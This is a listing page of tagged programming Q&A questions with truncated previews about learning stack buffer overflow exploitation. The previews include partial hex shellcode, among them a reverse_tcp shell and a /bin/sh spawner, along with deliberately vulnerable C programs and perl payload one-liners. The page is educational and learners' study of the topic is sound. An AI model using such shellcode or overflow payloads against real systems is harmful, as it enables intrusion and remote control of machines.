Tagged Questions
-1 votes, 0 answers, 31 views
Buffer overflow example receiving SEGFAULT instead of executing next instruction on the stack
I am attempting to learn about buffer overflows. I have written a simple C program that calls a function called checkpw() which allocates a char array 10 bytes large. When I analyze the opcode I ...
-1 votes, 1 answer, 40 views
Are there any other ways to make the program print the hostname to stdout, or just shellcode?
It is a lab assignment asking us to exploit this program. The first task is to call the notcalled function (which is solved by changing the return address to the notcalled function: perl -e 'printf "A"...
0 votes, 1 answer, 53 views
Illegal Instruction when trying to get shell from a simple stackoverflow
I'm trying to exploit the stack overflow vulnerability to get a shell. When I tried to run it, it shows an illegal hardware instruction after executing the shellcode instead of giving a shell (error ...
0 votes, 0 answers, 32 views
32-bit buffer overflow exploit: why do I need a 4-byte distance from the system address to the '/bin/sh' address on the stack?
So I have been playing around with buffer overflow exploits on a 32-bit system. I think I understand the basics, and what I expected was to build an exploit in the form (from lower address - top to ...
1 vote, 0 answers, 204 views
Why doesn't reverse_tcp shellcode work?
I am using this shellcode:
\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
0 votes, 1 answer, 87 views
$esp register not found
I am learning debugging with gdb and registers, but I am stuck at one point. As an instruction, I should print
print $esp
result: $1 = -9008
but I was expecting such result:
$2 = (void *) ...
3 votes, 2 answers, 1k views
Disabling stack protection in GCC not working
I'm trying to recreate a stack buffer overflow using the classic overflow with strcpy using this function:
#include <stdio.h>
#include <string.h>
void main(int argc, char **argv) {
...
5 votes, 3 answers, 2k views
Why is my stack buffer overflow exploit not working?
So I have a really simple stack overflow:
#include <stdio.h>
#include <string.h>  /* needed for memcpy and strlen */
int main(int argc, char *argv[]) {
    char buf[256];
    memcpy(buf, argv[1], strlen(argv[1]));  /* unbounded copy into a 256-byte buffer: the intended overflow */
    printf(buf);  /* user input used directly as the format string */
}
I'm trying to ...
1 vote, 0 answers, 97 views
\x00 treated as null byte and doesn't count
I'm trying to learn about stack overflows. When I want to overwrite the eip register I type this command in my shell:
run $(perl -e 'print "\xb8\x06\x40\x00" x 20;')
It is supposed to overwrite the ...
0 votes, 0 answers, 74 views
ESP after SEH Exception with same program on different computers
Below are a few articles that exploit different programs by using ESP after the SEH exception to POPAD back to a controllable part of the stack. The other article demonstrates stack pivoting finding ...
2 votes, 1 answer, 98 views
First experiments with buffer overflow
I've started reading about buffer overflows and how hackers use them to execute custom code instead of the regular compiled one, and now I'm trying to reproduce some basic situations, with a vulnerable ...
-4 votes, 2 answers, 66 views
Undefined computer behavior after running a C program
I am getting right to the point because I cannot explain the situation that I am going to describe. I need your attention please!
Yesterday I wrote a program in C. The program takes as input a string ...
1 vote, 1 answer, 202 views
How to prevent stack overflow when dealing with long recursive productions in C?
Given a grammar, how can one avoid the stack overflow problem when calculating FIRST and FOLLOW sets in C? The problem arose in my code when I had to recurse through a long production.
Example:
S->...
4 votes, 1 answer, 838 views
Stack-based buffer overflow - challenge in C using scanf with limited input
As part of a security CS course, my class has been given the task of exploiting a vulnerability to beat a password check using a stack/buffer overflow. The code with the vulnerability is as follows:
#...
1 vote, 1 answer, 829 views
Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential
I'm looking at Aleph One's article in Phrack magazine. The code below can also be found there.
We have a vulnerable executable whose code is:
vulnerable.c
void main(int argc, char *argv[]) {
...
0 votes, 2 answers, 664 views
Exploit Development - Shellcode Doesn't Work?
I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.
Firstly, I found the position of EIP was after the 26089 As (at ...
1 vote, 1 answer, 224 views
segmentation error while injecting shellcode to stack smash
I have been trying to understand how stack overflow attacks work. So far I can successfully redirect the return address to an instruction inside the original code. I have written a shellcode launcher ...
-2 votes, 2 answers, 235 views
How to do an infinite loop
My aim is to write an infinite loop. I have to print this string "Hello World %s" infinitely, and I can just use ROP (return-oriented programming).
gcc -fno-stack-protector loop.c -o loop
I can ...
0 votes, 1 answer, 909 views
Nop Sled, can you explain it to me?
I have been reading this book: Hacking, the art of exploitation
On page 140, the book explains the Nop Slide:
We’ll create a large array (or sled) of these NOP instructions and place it
before ...
0 votes, 0 answers, 241 views
Why does variable 'pass' change its value after a stack buffer overflow?
I can't understand what's happening with buf1 and pass in main(). I understand that after the buffer overflow in gets(buf1):
Firstly (by inputting more than 15 characters), we are actually
changing calling ...
0 votes, 1 answer, 187 views
Change the return address to point to shellcode
I'm using Linux and I have a C program. I would like to change the return address to point to my shellcode, but I'm unable to do it.
Here is my shellcode
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\...
0 votes, 1 answer, 186 views
Why doesn't putenv(buf) work properly, because memcpy(buf + 92, "\x00\x14\xe4\xf7", 4) copies a \x00 byte to buf?
I am using Ubuntu 14.04, so I have the latest kernel.
I am trying to do the return-to-libc method.
Here is my code to create an environment variable, which will later be input to the victim code
#include<...
16 votes, 3 answers, 1k views
Should the memory vulnerability of the line of code "printf("%s", argv[1]);" be described as a stack overflow?
Today, I took a short "C++ skills test" from Elance.com. One question was the following:
What is the security vulnerability of the following line of code:
printf("%s", argv[1]);
Option 1:...
3 votes, 1 answer, 417 views
How to set a gdb watchpoint to a value stored in register?
I'm trying to detect stack overflow in some function, and want to set a watchpoint to a memory pointed by the RSP register. I can't just set a watchpoint to a certain address as the function could be ...
-1 votes, 1 answer, 137 views
Need to detect any possible buffer overflows
Hi guys, I need some help with this code. I want to know if there is any buffer overflow in this code. Basically this is an exercise for my university. We need to exploit it to open a shell. Until now ...
8 votes, 2 answers, 24k views
Malloc segmentation fault
Here is the piece of code in which segmentation fault occurs (the perror is not being called):
job = malloc(sizeof(task_t));
if(job == NULL)
perror("malloc");
To be more precise, gdb says that ...
1 vote, 2 answers, 264 views
Overflowing a stack in theory.. and assembly
Assuming an x86 system with no ASLR, I'd like to ask the following:
1) Theory says that when we execute a stack overflow attack, the value pointed to by the ebp register is overwritten with the new ...
1 vote, 1 answer, 106 views
Does each process have its own portion of utopia in memory?
By doing some cat /proc/*some PID*/maps on multiple processes on a machine, I notice they all have the same starting point in regards to memory address, being 0x8048000. Does this mean that every ...
9 votes, 3 answers, 622 views
Smashing the stack example3.c confusion
Article can be found here.
I'm reading up on smashing the stack and have found myself to be getting stuck on example3.c.
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <...
6 votes, 2 answers, 3k views
What is the difference between STATUS_STACK_BUFFER_OVERRUN and STATUS_STACK_OVERFLOW?
I just found out that there is a STATUS_STACK_BUFFER_OVERRUN and a STATUS_STACK_OVERFLOW. What's the difference between those 2? I just found Stack overflow (stack exhaustion) not the same as stack ...
0 votes, 1 answer, 127 views
Are the old days of code injection over? [closed]
I was wondering since all updated operating systems guard against stack and heap type overflows via ASLR, Canary Checks, and other such methods, are memory corruption exploits still prevalent? Given ...
0 votes, 1 answer, 908 views
Rewriting EBP stack return value
Hi, I'm trying to write an overflow exploit for a simple program that I've built. Below is the C program that I've written.
#include <unistd.h>
#include <string.h>
#include <stdio.h>...
2 votes, 5 answers, 4k views
Execution of function pointer to Shellcode
I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main.
The problem is I'm getting segmentation fault.
#include <stdio.h>
char shellcode[]= "/0xbb/...
0 votes, 2 answers, 373 views
Is buffer overflow considered a "solved problem"? (at least for future systems)
I am looking at various buffer/heap/stack protection technologies such as PAX, DEP, NX, CANARIES, etc
And a new one SMEP - http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-...
8 votes, 1 answer, 3k views
return to libc - problem
I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack).
This is my program:
int main(int argc, ...
1 vote, 3 answers, 419 views
Buffer overflow - not getting the correct output
The shellcode prints the hostname (bin/hostname), but when I execute the code it shows me the path in reverse order but does not print the HOSTNAME.
I am actually doing the buffer overflow.
I ...
-1 votes, 4 answers, 141 views
Problem with ANSI C: unexpected behaviour? [closed]
I am suffering from an unexpected behavior; here is the problem definition:
I have applications communicating on a LAN via UDP protocol. I am reading the IP address and port number from a text file. ...
1 vote, 4 answers, 385 views
About buffer overflow
I am new to the ethical hacking world, and one of the most important things is the stack overflow. Anyway, I coded a vulnerable C program which has a char name[400] statement, and when I try to run ...
3 votes, 3 answers, 2k views
Illustration of buffer overflows for students (linux, C)
My friend is a teacher of first-year CS students. We want to show them buffer overflow exploitation. But modern distributions are protected from simple buffer overflows:
HOME=`perl -e "print 'A'x269"` ...
13 votes, 3 answers, 385 views
Causing PHP to crash
How can PHP cause memory leaks, buffer overflows, stack overflows and any other errors of such kind? Can PHP even cause such errors?
3 votes, 3 answers, 642 views
Setting up Environment for Buffer Overflow Learning
I am currently reading several security books (my passion) regarding secure programming; however, either the distros they provide on disc are faulty or non-existent.
Books: Hacking The art of ...
48 votes, 9 answers, 22k views
What is the difference between a stack overflow and buffer overflow?
What is the difference between a stack overflow and a buffer overflow in programming?
5 votes, 3 answers, 4k views
Is there any way to bypass SSP (StackSmashing Protection)/Propolice?
After some research I haven't found any paper describing a method to do this (not even an unreliable one). It seems that SSP (StackSmashing Protection)/Propolice
5 votes, 2 answers, 5k views
Stack execution protection and randomization on Ubuntu
As part of a course assignment I need to write exploit code to cause a buffer overflow and execute code that is present on the stack.
I have turned off the stack randomization by the following command:
...
7 votes, 3 answers, 5k views
Stack Overflow Exploit in C
The question is actually about stack overflows in C.
I have an assignment that I cannot get done for the life of me; I've looked at everything in gdb and I just can't figure it out.
The question is ...